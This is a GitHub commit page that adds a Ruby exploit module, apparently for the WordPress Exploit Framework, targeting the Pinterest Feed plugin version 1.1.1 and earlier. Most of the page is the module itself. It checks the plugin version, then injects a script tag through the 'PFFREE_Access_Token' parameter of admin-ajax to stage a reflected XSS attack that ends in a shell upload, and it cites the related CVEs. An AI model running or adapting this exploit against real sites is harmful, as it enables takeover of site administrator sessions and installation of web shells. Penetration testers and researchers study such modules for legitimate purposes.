Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 90af8ca

Browse files
committed
Add Pinterest Feed <= 1.1.1 reflected XSS shell upload
1 parent 5013ba8 commit 90af8ca

File tree

1 file changed

+37
-0
lines changed

1 file changed

+37
-0
lines changed
Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
# frozen_string_literal: true
2+
3+
class Wpxf::Exploit::PinterestFeedReflectedXssShellUpload < Wpxf::Module
4+
include Wpxf::WordPress::StagedReflectedXss
5+
6+
def initialize
7+
super
8+
9+
update_info(
10+
name: 'Pinterest Feed <= 1.1.1 Reflected XSS Shell Upload',
11+
author: [
12+
'd4wner', # Dislosure
13+
'rastating' # WPXF module
14+
],
15+
references: [
16+
['CVE', '2018-5653'],
17+
['CVE', '2018-5654'],
18+
['CVE', '2018-5655'],
19+
['CVE', '2018-5656'],
20+
['WPVDB', '9009']
21+
],
22+
date: 'Jan 12 2018'
23+
)
24+
end
25+
26+
def check
27+
check_plugin_version_from_readme('weblizar-pinterest-feeds', '1.1.2')
28+
end
29+
30+
def initial_script
31+
create_basic_post_script(
32+
wordpress_url_admin_ajax,
33+
'action' => 'pffree_security',
34+
'PFFREE_Access_Token' => "'\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
35+
)
36+
end
37+
end

0 commit comments

Comments
 (0)